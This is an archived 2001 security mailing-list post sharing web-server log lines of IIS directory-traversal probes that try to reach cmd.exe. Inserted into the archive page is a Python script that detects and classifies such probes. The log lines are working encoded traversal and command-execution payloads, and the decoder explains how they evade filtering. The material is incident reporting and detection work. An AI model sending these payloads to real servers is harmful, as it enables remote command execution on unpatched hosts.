Possible new worm using directory traversal vulnerability?

From: thomas lakofski (thomasat_private)
Date: Tue Sep 18 2001 - 07:13:14 PDT


    Hi,
    
    Found this in my logs this afternoon; you may find it interesting. From what I
    can tell it's following a similar pattern of address scanning as CRII -- looks
    like too many hosts, too quickly, to be manual scanning.
    
    Here's a sample; the full log is at http://88.net/~thomas/codeindigo.txt [for
    want of a better name]:
    
    209.9.66.167 - - [18/Sep/2001:13:23:57 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
    209.9.66.167 - - [18/Sep/2001:13:23:57 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
    209.9.66.167 - - [18/Sep/2001:13:23:58 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
    209.9.66.167 - - [18/Sep/2001:13:24:02 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
    209.9.66.167 - - [18/Sep/2001:13:24:05 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
    209.9.66.167 - - [18/Sep/2001:13:24:06 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
    209.9.66.167 - - [18/Sep/2001:13:24:07 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
    209.9.66.167 - - [18/Sep/2001:13:24:10 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
    209.9.66.167 - - [18/Sep/2001:13:24:11 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
    209.9.66.167 - - [18/Sep/2001:13:24:11 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
    209.9.66.167 - - [18/Sep/2001:13:24:12 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
    209.9.66.167 - - [18/Sep/2001:13:24:13 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
    209.9.66.167 - - [18/Sep/2001:13:24:13 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
    209.9.66.167 - - [18/Sep/2001:13:24:14 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
    
    regards,
    
    -thomas
    
    
    -- 
     Do what thou wilt shall be the whole of the Law.
                    -- Aleister Crowley
    gpg: pub 1024D/81FD4B43 sub 4096g/BB6D2B11=>p.nu/d
    2B72 53DB 8104 2041 BDB4  F053 4AE5 01DF 81FD 4B43
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
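The scan pattern in the log above, as detection logic one could run over such lines (an added example, not part of the original post and not any tool the poster used): it parses Apache combined-format lines, decodes each request path the way these probes expect an unpatched IIS to (two rounds of percent-decoding, then a lenient two-byte UTF-8 collapse that turns sequences such as %c0%af and %c1%1c into '/' and '\'), flags anything that resolves to cmd.exe, and groups hits per source address so that many probes from one address within a few seconds stand out as automated scanning. The sample lines, the burst thresholds and the lenient decoder are constructed assumptions modelled on the post, not taken from IIS or from a live capture.

```python
# Added example (not from the original post): classify IIS cmd.exe probes in
# Apache combined-format logs and group them per source to spot automated scans.
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_to_bytes

# Constructed sample modelled on the lines in the post above (not a live capture).
SAMPLE_LOG = """\
209.9.66.167 - - [18/Sep/2001:13:23:57 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:23:58 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:07 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:11 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
209.9.66.167 - - [18/Sep/2001:13:24:12 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
10.0.0.5 - - [18/Sep/2001:13:25:00 +0000] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)


def lenient_utf8(data: bytes) -> bytes:
    """Collapse 0xC0-0xDF + any byte into one ASCII byte when the result is < 0x80.

    Assumption: models the lax decoder the %c0%af / %c1%1c probes rely on; it
    does not check the continuation bits, so overlong and malformed pairs both
    become '/' (0x2F) or '\\' (0x5C).
    """
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            val = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            if val < 0x80:  # overlong encoding of an ASCII character
                out.append(val)
                i += 2
                continue
        out.append(b)
        i += 1
    return bytes(out)


def decode_like_iis(raw_path: str) -> str:
    """Percent-decode twice (double-decode bug), collapse UTF-8, normalise slashes."""
    twice = unquote_to_bytes(unquote_to_bytes(raw_path))
    return lenient_utf8(twice).decode("latin-1").replace("\\", "/").lower()


def classify(target: str):
    """Return (technique, encoding) for a cmd.exe probe, or None for anything else."""
    path = decode_like_iis(target.split("?", 1)[0])
    if "cmd.exe" not in path:
        return None
    technique = "traversal" if "/../" in path else "direct"
    low = target.lower()
    if "%25" in low or "%%" in low:
        encoding = "double-decode"
    elif "%c0" in low or "%c1" in low:
        encoding = "overlong-utf8"
    elif "%" in low:
        encoding = "percent"
    else:
        encoding = "plain"
    return technique, encoding


def parse_line(line: str):
    """Split one combined-format line into (ip, timestamp, target, status)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["target"], int(m["status"])


def summarise(log_text: str, burst_window: int = 60, burst_min: int = 5) -> dict:
    """Group cmd.exe probes per source IP; the thresholds are assumptions."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, target, status = rec
        hit = classify(target)
        if hit:  # count the probe even if the server answered 400 or 404
            per_ip[ip].append((ts, hit[0], hit[1], status))
    report = {}
    for ip, probes in per_ip.items():
        probes.sort(key=lambda p: p[0])
        span = int((probes[-1][0] - probes[0][0]).total_seconds())
        report[ip] = {
            "probes": len(probes),
            "span_seconds": span,
            "techniques": sorted({p[1] for p in probes}),
            "encodings": sorted({p[2] for p in probes}),
            "automated": len(probes) >= burst_min and span <= burst_window,
        }
    return report


if __name__ == "__main__":
    for ip, info in summarise(SAMPLE_LOG).items():
        print(ip, info)
```

Two things worth noting when reading the output against the post. The `..%%35%63..` line drew a 400 from Apache because the first `%` is not a valid escape, yet the intent is identical to `%255c` (it decodes to `%5c` and then to a backslash), so the classifier counts it rather than trusting the status code. And since every one of these requests is IIS-specific, 404s on an Apache host only tell you who is scanning and how fast; they say nothing about whether anything was compromised.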
    



    This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:11:19 PDT